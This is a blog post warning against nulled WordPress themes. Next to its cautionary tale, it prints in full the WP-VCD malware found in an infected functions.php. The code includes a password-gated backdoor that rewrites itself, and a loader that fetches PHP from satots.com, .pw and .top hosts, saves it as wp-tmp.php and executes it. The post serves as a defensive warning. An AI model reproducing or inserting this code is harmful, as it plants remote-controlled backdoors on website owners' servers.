Sunday, December 16, 2018

WordPress Theme Examination

Cracked , nulled , hacked and download for free are keywords/terms you should always avoid.
An examination of a NULLED THEME revealed some pretty NASTY and definitely FREE functions.
Before we proceed lets make-up a small story. We will use the name John and we will refer to a guy who's a website developer and "builds" wordpress websites for clients.

Another imaginary guy who we will name Frank will serve the role of the client on this example.

So lets summarize:
John creates websites , Frank wants to build a website , so he hires John.
John's goal is to make as much profit as possible.
So after discussing with the the client and sealing the deal , John decides to reduce the costs and increase his profit even more by downloading a cracked theme instead of buying it from a legitimate source. [and of course not letting the client know anything about it]

DON'T BE LIKE JOHN.

Results:
Malware Infected websites , blacklisted , compromised etc.


Tips for Clients like Frank:
If you decide to go with a wordpress theme and the developer is not someone you are 100% sure that hes not going to follow the same path that John did on the previous example just BUY yourself the wordpress theme and provide him with the .zip sources.

Below you will see a malware of John's EPIC work which basically infected all templates (functions.php and core.php). I manually removed all of the instances of the script(functions.php , wp-core.php , wp-tmp.php , wp-vcd.php) , checked all the recently modified files on the whole server and run at last a scan by AMSB.

Malware Details: https://github.com/rakshitshah94/wordpress-wp-vcd-malware-attack-solution

An infected sample of functions.php file:

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '10948a2cd002f84e83693c76f362cd1e'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{

if (!empty($_REQUEST['newdomain']))
{
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                    {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                           @file_put_contents(__FILE__, $file);
                           print "true";
                                                                                                             }


                                                                    }
}
}
break;

case 'change_code';
if (isset($_REQUEST['newcode']))
{

if (!empty($_REQUEST['newcode']))
{
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                    {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

                                                                           $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                           @file_put_contents(__FILE__, $file);
                           print "true";
                                                                                                             }


                                                                    }
}
}
break;

default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}

die("");
}

$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
           if( fwrite($handle, "<?php\n" . $phpCode))
   {
   }
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='2967d26a5e5850cadd9eced25d5465fa';
        if (($tmpcontent = @file_get_contents("http://www.satots.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.satots.com/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.satots.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } 

        elseif ($tmpcontent = @file_get_contents("http://www.satots.top/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } 
        
        
        
        
        
    }
}